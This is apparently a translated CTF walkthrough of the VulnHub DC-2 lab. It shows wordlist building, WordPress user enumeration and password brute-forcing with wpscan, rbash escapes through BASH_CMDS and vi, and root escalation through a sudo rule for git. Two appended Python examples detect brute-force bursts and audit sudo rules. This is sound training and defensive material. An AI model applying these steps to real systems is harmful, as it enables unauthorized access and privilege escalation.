VulnHub: DC-2

Information gathering

Identifying the target

└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:9e:68:11, IPv4: 192.168.123.37
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.123.2     d4:8f:a2:9f:51:49       Huawei Device Co., Ltd.
192.168.123.9     30:03:c8:49:52:4d       CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.123.5     3c:55:76:dc:ab:f5 (42:f1:e2:49:51:a5)   CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.123.7     3c:e9:f7:c0:ef:c7 (42:f1:e2:49:51:a5)   Intel Corporate
192.168.123.8     e4:05:41:0c:9a:2c (42:f1:e2:49:51:a5)   (Unknown)
192.168.123.6     7c:b5:66:a5:f0:a5       Intel Corporate
192.168.123.177    00:0c:29:57:ff:26       VMware, Inc.
192.168.123.30    7c:b5:66:a5:f0:a5       Intel Corporate
192.168.123.41    7c:b5:66:a5:f0:a5       Intel Corporate
192.168.123.18    c4:75:ab:58:e4:8b       Intel Corporate
192.168.123.12    42:45:ab:5e:e9:ce       (Unknown: locally administered)

11 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.494 seconds (102.65 hosts/sec). 11 responded



Target: 192.168.123.177    00:0c:29:57:ff:26

Port scan

└─# nmap -sV -p- 192.168.123.177
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-05 10:23 CST
Nmap scan report for 192.168.123.177
Host is up (0.00044s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
MAC Address: 00:0C:29:57:FF:26 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.71 seconds

flag 1

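Browsing to the web service on port 80 fails with a "cannot be reached" error, probably because of a redirect.

After editing the hosts file (Windows: C:\Windows\System32\drivers\etc, Linux: /etc/hosts) and adding the entry 192.168.123.177 dc-2, the site loads normally.

The menu at the bottom right has a Flag page: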

Welcome		What We Do	Our People	Our Products	Flag

FLAG
Flag 1:

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can’t win them all.

Log in as one to see the next flag.

If you can’t find it, log in as another.

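Flag 1 (translation):

Your usual wordlists may not work, so perhaps you just need to be clever.

More passwords are always better, but sometimes you can't remember them all.

Log in as one user to see the next flag.

If you can't find it, log in as another.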

flag 2

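The first sentence of the hint talks about being clever ("be cewl"), and cewl is also the name of a tool.

CeWL is an application written in Ruby. You give its spider a URL and a crawl depth, and can optionally have it follow external links; CeWL then returns a wordlist file that you can feed to password crackers such as John the Ripper. In addition, CeWL also provides a command-line tool.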


┌──(root㉿kali)-[~]
└─# cewl http://dc-2 -w passwd.txt

CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
Couldn't hit the site http://dc-2, moving on

┌──(root㉿kali)-[~]
└─# cat passwd.txt     # the file turns out to be empty

┌──(root㉿kali)-[~]
└─# cewl http://192.168.1.36 -w passwd.txt
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

┌──(root㉿kali)-[~]
└─# cat passwd.txt     # still empty; then I remembered the redirect from earlier and that I had forgotten to add the hosts entry on Kali

┌──(root㉿kali)-[~]
└─# vim /etc/hosts

┌──(root㉿kali)-[~]
└─# systemctl restart networking.service

┌──(root㉿kali)-[~]
└─# cewl http://dc-2 -w passwd.txt
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

┌──(root㉿kali)-[~]
└─# cat passwd.txt
sit
amet
nec
quis
vel
orci
site
……

Next, try to find the accounts and a login form by scanning the directories.

┌──(root㉿kali)-[~]
└─# dirb http://192.168.123.177

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Jan  6 19:33:09 2024
URL_BASE: http://192.168.123.177/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.123.177/ ----
+ http://192.168.123.177/index.php (CODE:200|SIZE:53562)
+ http://192.168.123.177/server-status (CODE:403|SIZE:303)
==> DIRECTORY: http://192.168.123.177/wp-admin/
==> DIRECTORY: http://192.168.123.177/wp-content/
==> DIRECTORY: http://192.168.123.177/wp-includes/
+ http://192.168.123.177/xmlrpc.php (CODE:405|SIZE:42)

---- Entering directory: http://192.168.123.177/wp-admin/ ----
+ http://192.168.123.177/wp-admin/admin.php (CODE:302|SIZE:0)    #admin.php
==> DIRECTORY: http://192.168.123.177/wp-admin/css/
==> DIRECTORY: http://192.168.123.177/wp-admin/images/
==> DIRECTORY: http://192.168.123.177/wp-admin/includes/
+ http://192.168.123.177/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.123.177/wp-admin/js/
==> DIRECTORY: http://192.168.123.177/wp-admin/maint/
==> DIRECTORY: http://192.168.123.177/wp-admin/network/
==> DIRECTORY: http://192.168.123.177/wp-admin/user/

---- Entering directory: http://192.168.123.177/wp-content/ ----
+ http://192.168.123.177/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.123.177/wp-content/languages/
==> DIRECTORY: http://192.168.123.177/wp-content/plugins/
==> DIRECTORY: http://192.168.123.177/wp-content/themes/

---- Entering directory: http://192.168.123.177/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.123.177/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.123.177/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.123.177/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.123.177/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.123.177/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.123.177/wp-admin/network/ ----
+ http://192.168.123.177/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.123.177/wp-admin/network/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.123.177/wp-admin/user/ ----
+ http://192.168.123.177/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.123.177/wp-admin/user/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.123.177/wp-content/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.123.177/wp-content/plugins/ ----
+ http://192.168.123.177/wp-content/plugins/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.123.177/wp-content/themes/ ----
+ http://192.168.123.177/wp-content/themes/index.php (CODE:200|SIZE:0)

-----------------
END_TIME: Sat Jan  6 19:33:33 2024
DOWNLOADED: 32284 - FOUND: 12

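The results include admin.php; visiting it shows the WordPress login page. WordPress has a well-known scanner, wpscan.

We have a password wordlist but no usernames, so enumerate the usernames: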

┌──(root㉿kali)-[~]
└─# wpscan --url http://dc-2/ -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://dc-2/ [192.168.123.177]
[+] Started: Sat Jan  6 20:25:50 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | Last Updated: 2023-11-07T00:00:00.000Z
 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.4
 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==========================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Jan  6 20:25:52 2024
[+] Requests Done: 58
[+] Cached Requests: 6
[+] Data Sent: 13.894 KB
[+] Data Received: 514.805 KB
[+] Memory used: 197.43 MB
[+] Elapsed time: 00:00:02

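Three users were enumerated: admin, jerry and tom. Create a text file user.txt and save them in it.

Once that is done, use wpscan to brute-force the account passwords: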

┌──(root㉿kali)-[~]
└─# wpscan --url http://dc-2/ -U user.txt -P passwd.txt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://dc-2/ [192.168.123.177]
[+] Started: Sat Jan  6 20:58:06 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | Last Updated: 2023-11-07T00:00:00.000Z
 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.4
 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <========> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient
Trying admin / log Time: 00:00:28 <=========       > (646 / 1121) 57.62%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Jan  6 20:58:38 2024
[+] Requests Done: 819
[+] Cached Requests: 5
[+] Data Sent: 364.608 KB
[+] Data Received: 751.28 KB
[+] Memory used: 250.488 MB
[+] Elapsed time: 00:00:31

The attack turned up two credential pairs: jerry / adipiscing and tom / parturient.

After logging in as jerry, clicking Pages in the left-hand menu reveals flag 2.
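What this password attack looks like from the server side, as an added detection example that is not part of the original post: wpscan sent 819 requests in about 31 seconds, most of them POSTs to /xmlrpc.php, so a sliding-window count per client over the Apache access log picks it up. The log lines are constructed, and the function names, the threshold and the second client address 10.0.0.5 are assumptions made for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache access-log prefix: client, timestamp, request line, status.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# WordPress endpoints that accept credentials.
AUTH_PATHS = {"/xmlrpc.php", "/wp-login.php"}
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse(line):
    """Return (ip, timestamp, method, path without query) or None if unparsable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], TS_FMT)
    return m["ip"], ts, m["method"], m["path"].split("?", 1)[0]


def find_bursts(lines, threshold=20, window=timedelta(seconds=60)):
    """Map client IP -> peak number of auth POSTs inside one sliding window,
    keeping only clients whose peak reaches the threshold.
    A failed XML-RPC login still answers HTTP 200, so requests are counted
    instead of relying on error status codes."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec and rec[2] == "POST" and rec[3] in AUTH_PATHS:
            hits[rec[0]].append(rec[1])
    flagged = {}
    for ip, times in hits.items():
        times.sort()
        start = peak = 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # drop hits older than the window
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def sample_log():
    """Constructed log: 30 XML-RPC POSTs in 30 s from one client, plus normal traffic."""
    base = datetime.strptime("06/Jan/2024:20:58:06 +0800", TS_FMT)
    fmt = '{ip} - - [{ts}] "{req} HTTP/1.1" {st} 512 "-" "-"'
    lines = [fmt.format(ip="192.168.123.37", req="POST /xmlrpc.php", st=200,
                        ts=(base + timedelta(seconds=i)).strftime(TS_FMT))
             for i in range(30)]
    lines += [fmt.format(ip="10.0.0.5", req="POST /wp-login.php", st=302,
                         ts=(base + timedelta(minutes=5 * i)).strftime(TS_FMT))
              for i in range(3)]
    lines.append(fmt.format(ip="10.0.0.5", req="GET /index.php", st=200,
                            ts=base.strftime(TS_FMT)))
    return lines


if __name__ == "__main__":
    for ip, peak in find_bursts(sample_log()).items():
        print(f"{ip}: {peak} auth POSTs within 60 s")
```

Rate limiting or blocking /xmlrpc.php where it is not needed removes the endpoint this count is watching.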

Flag 2:

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

Translation: If you can't exploit WordPress and take a shortcut, there is another way.

Hopefully you can find another entry point.

flag 3

Speaking of another entry point: the initial port scan also showed an SSH service that had been moved to port 7744.

┌──(root㉿kali)-[~]
└─# ssh jerry@192.168.123.177 -p 7744
The authenticity of host '[192.168.123.177]:7744 ([192.168.123.177]:7744)' can't be established.
ED25519 key fingerprint is SHA256:JEugxeXYqsY0dfaV/hdSQN31Pp0vLi5iGFvQb8cB1YA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? y
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '[192.168.123.177]:7744' (ED25519) to the list of known hosts.
jerry@192.168.123.177's password:
Permission denied, please try again.    # try the other account
jerry@192.168.123.177's password:


┌──(root㉿kali)-[~]
└─# ssh tom@192.168.123.177 -p 7744
tom@192.168.123.177's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ ls
flag3.txt  usr
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found   # restricted by rbash

tom@DC-2:~$ compgen -c   # list the commands that can be used
if
then
else
elif
fi
……
less
scp
ls
vi

tom@DC-2:~$ vi flag3.txt

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

Translation: Poor old Tom is always chasing after Jerry. Perhaps he should sue Jerry for all the stress he causes him.

flag 4

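The hint mentions su, suggesting that we escalate privileges.

Escaping rbash through environment variables (I collected this method from more experienced people and can't explain the principle myself; if anyone knows, please tell me in the comments).

tom@DC-2:~$ export -p        # list the environment variables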
declare -x HOME="/home/tom"
declare -x LANG="en_US.UTF-8"
declare -x LOGNAME="tom"
declare -x MAIL="/var/mail/tom"
declare -x OLDPWD
declare -rx PATH="/home/tom/usr/bin"
declare -x PWD="/home/tom"
declare -rx SHELL="/bin/rbash"
declare -x SHLVL="1"
declare -x SSH_CLIENT="192.168.123.76 43952 7744"
declare -x SSH_CONNECTION="192.168.123.76 43952 192.168.123.177 7744"
declare -x SSH_TTY="/dev/pts/0"
declare -x TERM="xterm-256color"
declare -x USER="tom"   

tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a  # assign /bin/sh to a, then run a
$ /bin/bash
tom@DC-2:~$ export PATH=$PATH:/bin/  # note: append /bin to PATH and export it
tom@DC-2:~$ export PATH=$PATH:/usr/bin  # note: append /usr/bin to PATH and export it

The rbash escape worked.

tom@DC-2:~$ su - jerry  # works when the - is added
Password:
jerry@DC-2:~$ vi flag4.txt


Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

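Translation: Good to see that you have come this far, but you are not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here; you are on your own now.

Go away, get out of here!!!!

ps:
su and su -
- The former only switches to the root identity, but **the shell environment is still the ordinary user's shell**;
- the latter switches both the user and the shell environment to root. **Only when the shell environment is switched as well do PATH environment-variable errors not occur**.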

flag 5

The hint mentions git, so there may be a git-based privilege escalation; it looks like we are now expected to take root.


jerry@DC-2:/home/tom$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/at
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/bin/umount
/bin/mount
/bin/su

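ps:
find / -perm -u=s -type f 2>/dev/null
This is a `find` command, used on Unix-like operating systems to search the file system.

1. `find`: a command-line tool for searching for files and directories in the file system.
2. `/`: the starting point of the search; here, the root directory of the file system.
3. `-perm -u=s`: a permission test that selects files with specific permission bits.

	* `-perm`: search by file permissions.
	* `-u=s`: match files that have the setuid bit (s) set for the owner (u). Setuid is a special permission: when such a file is executed, it runs with the identity of the file's owner rather than that of the user who ran it.
4. `-type f`: a type test that restricts the search to regular files (no directories, symbolic links or other file types).
5. `2>/dev/null`: a redirection that discards error messages. It sends standard error (file descriptor 2) to `/dev/null`, so any errors caused by permission problems are not shown on screen.

Summary: the command finds all regular files on the file system that have the setuid bit set, ignoring any errors caused by permission problems.


sudo is in the list.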

jerry@DC-2:/home/tom$ sudo -l  # see what can be run with sudo
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git

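git can be run as root.

We can escalate through git in two ways:

1. sudo git help config
!/bin/bash or !'sh' # typed in the bottom-line command mode; this completes the escalation
2. sudo git -p help
!/bin/bash # typing !/bin/bash opens a shell running as root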

jerry@DC-2:~$ sudo git help config
root@DC-2:/home/jerry#

The escalation succeeded and we have root. Switch to the /root directory:

root@DC-2:/home/tom# cd /root
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat final-flag.txt
 __    __     _ _       _                    _
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

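Translation: Congratulations!!!

Special thanks to everyone who sent me tweets
and gave me feedback; it means a great deal to me.
Thank you.

If you enjoyed this CTF, send me a tweet via @DCAU7.

ps:
For the rbash bypass above, if you only want to read flag4 you can also use the simpler method below, an escape through vi's command mode.
The drawback is that the usable commands are still limited, but it never hurts to know more than one method.

Open any file with vi,
then enter the following on the bottom line: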
:set shell=/bin/sh
:shell

$      # the escape succeeded
$ cd ..
$ ls
jerry  tom
$ cd jerry
$ ls
flag4.txt
$ vi flag4.txt
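A defender's counterpart to the two escapes in this walkthrough (the restricted shell whose PATH contained vi, less and scp, and the sudo rule for git), added here as an example that is not part of the original post. It audits `sudo -l` output and a restricted PATH for programs that can start a shell from inside; the SHELL_CAPABLE set is an illustrative subset and the function names are assumptions made for the example.

```python
import posixpath
import re

# Programs that can start a shell or run arbitrary commands from inside
# (pager "!" escapes, editor ":shell", -exec options, ...).
# Illustrative subset chosen for this example, not an exhaustive list.
SHELL_CAPABLE = {"git", "vi", "vim", "less", "more", "man", "scp",
                 "find", "awk", "ed", "ftp"}

# One rule line of `sudo -l` output, e.g. "    (root) NOPASSWD: /usr/bin/git"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$"
)


def risky_sudo_rules(sudo_l_output):
    """Return (runas, command, nopasswd) for every rule that grants ALL
    or a program from SHELL_CAPABLE."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # Defaults lines, headers and blank lines
        nopasswd = "NOPASSWD:" in m["tags"]
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            if not cmd:
                continue
            binary = posixpath.basename(cmd.split()[0])
            if cmd == "ALL" or binary in SHELL_CAPABLE:
                findings.append((m["runas"].strip(), cmd, nopasswd))
    return findings


def risky_rbash_commands(allowed):
    """Given the command names reachable from a restricted shell's PATH,
    return the ones that can be used to leave the restriction."""
    return sorted(name for name in allowed if name in SHELL_CAPABLE)


# `sudo -l` output for jerry as shown in the walkthrough.
SUDO_L = """\
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
"""
# External commands visible at the end of tom's (elided) `compgen -c` listing.
TOM_PATH = ["less", "scp", "ls", "vi"]

if __name__ == "__main__":
    for runas, cmd, nopasswd in risky_sudo_rules(SUDO_L):
        print(f"sudo: {cmd} as {runas} (NOPASSWD={nopasswd})")
    print("rbash PATH:", ", ".join(risky_rbash_commands(TOM_PATH)))
```

Every hit is a rule or PATH entry to remove or to replace with a wrapper that runs one fixed, non-interactive command.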